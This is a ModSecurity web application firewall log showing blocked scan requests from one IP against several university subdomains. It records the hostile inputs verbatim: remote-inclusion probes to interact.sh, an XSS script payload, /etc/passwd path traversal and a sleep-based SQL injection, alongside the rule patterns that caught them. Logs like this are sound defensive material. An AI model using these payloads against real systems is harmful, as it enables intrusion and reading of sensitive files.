[Tue Aug 29 11:52:12.594890 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAn0GcAAAAAa"]
[Tue Aug 29 11:52:12.594903 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:password: admin\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO15fMCo-f0AAAnjjMMAAAAX"]
[Tue Aug 29 11:52:12.595014 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnoOpYAAAAf"]
[Tue Aug 29 11:52:12.604618 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAlIBkMAAAAn"]
[Tue Aug 29 11:52:12.639578 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fMCo-f0AAAnTlMwAAAAA"]
[Tue Aug 29 11:52:13.537507 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAoCWFMAAAAB"]
[Tue Aug 29 11:52:13.578291 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnkwf8AAAAY"]
[Tue Aug 29 11:52:13.580629 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnIlo0AAAAV"]
[Tue Aug 29 11:52:13.715666 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnTlM8AAAAA"]
[Tue Aug 29 11:52:13.727371 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAnn2BQAAAAe"]
[Tue Aug 29 11:52:13.727691 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAlIBkcAAAAn"]
[Tue Aug 29 11:52:13.734129 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnoOpwAAAAf"]
[Tue Aug 29 11:52:13.735142 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAn0GcUAAAAa"]
[Tue Aug 29 11:52:13.738821 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/redirect.php"] [unique_id "ZO15fcCo-f0AAAnIlo8AAAAV"]
[Tue Aug 29 11:52:13.770535 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fcCo-f0AAAni@-wAAAAU"]
[Tue Aug 29 11:52:14.543551 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnkwgMAAAAY"]
[Tue Aug 29 11:52:14.563649 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAnjjMsAAAAX"]
[Tue Aug 29 11:52:14.665013 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAn0GcgAAAAa"]
[Tue Aug 29 11:52:14.667907 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnn2BcAAAAe"]
[Tue Aug 29 11:52:14.678996 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAjdQbIAAAAZ"]
[Tue Aug 29 11:52:14.680397 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnkwgQAAAAY"]
[Tue Aug 29 11:52:14.685605 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAn0GckAAAAa"]
[Tue Aug 29 11:52:14.696914 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15fsCo-f0AAAnoOqAAAAAf"]
[Tue Aug 29 11:52:14.713543 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAlIBk0AAAAn"]
[Tue Aug 29 11:52:14.715699 2023] [:error] [pid 2562] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/propertyfinder/component/jesectionfinder/"] [unique_id "ZO15fsCo-f0AAAoCWFsAAAAB"]
[Tue Aug 29 11:52:14.724832 2023] [:error] [pid 2557] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 3 / [28] [BANNER_AREA_FOOTER2] \\xd0\\x9f\\xd0\\xbe\\xd1\\x81\\xd0\\xb5\\xd1\\x82\\xd0\\xb8\\xd1\\x82\\xd0\\xb5 \\xd0\\xb2\\xd0\\xb2\\xd0\\xbe\\xd0\\xb4\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xb1\\xd0\\xb5\\xd1\\x81\\xd0\\xbf\\xd0\\xbb\\xd0\\xb0\\xd1\\x82\\xd0\\xbd\\xd1\\x83\\xd1\\x8e \\xd0\\xbb\\xd0\\xb5\\xd0\\xba\\xd1\\x86\\xd0\\xb8\\xd1\\x8e APTOS"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15fsCo-f0AAAn95-QAAAAD"]
[Tue Aug 29 11:52:14.736883 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnoOqIAAAAf"]
[Tue Aug 29 11:52:14.736990 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAlUlqoAAAA0"]
[Tue Aug 29 11:52:14.750920 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnTlNYAAAAA"]
[Tue Aug 29 11:52:14.752081 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnd3FEAAAAI"]
[Tue Aug 29 11:52:14.759674 2023] [:error] [pid 2536] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15fsCo-f0AAAnoOqMAAAAf"]
[Tue Aug 29 11:52:15.531175 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAlUlqwAAAA0"]
[Tue Aug 29 11:52:15.541568 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAnTlNcAAAAA"]
[Tue Aug 29 11:52:15.558218 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:1[3]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))-- found within ARGS:1[3]: or 'a'='a') and (select sleep(6))--"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/v1/components"] [unique_id "ZO15f8Co-f0AAAfWOMkAAAAL"]
[Tue Aug 29 11:52:15.576136 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:event3. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  / [ found within ARGS:event3: 1 / [84] [MOBILE_HOME] Love Card"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/bitrix/rk.php"] [unique_id "ZO15f8Co-f0AAAlUlq0AAAA0"]
[Tue Aug 29 11:52:15.576167 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/remotereporter/load_logfiles.php"] [unique_id "ZO15f8Co-f0AAAni-AIAAAAU"]
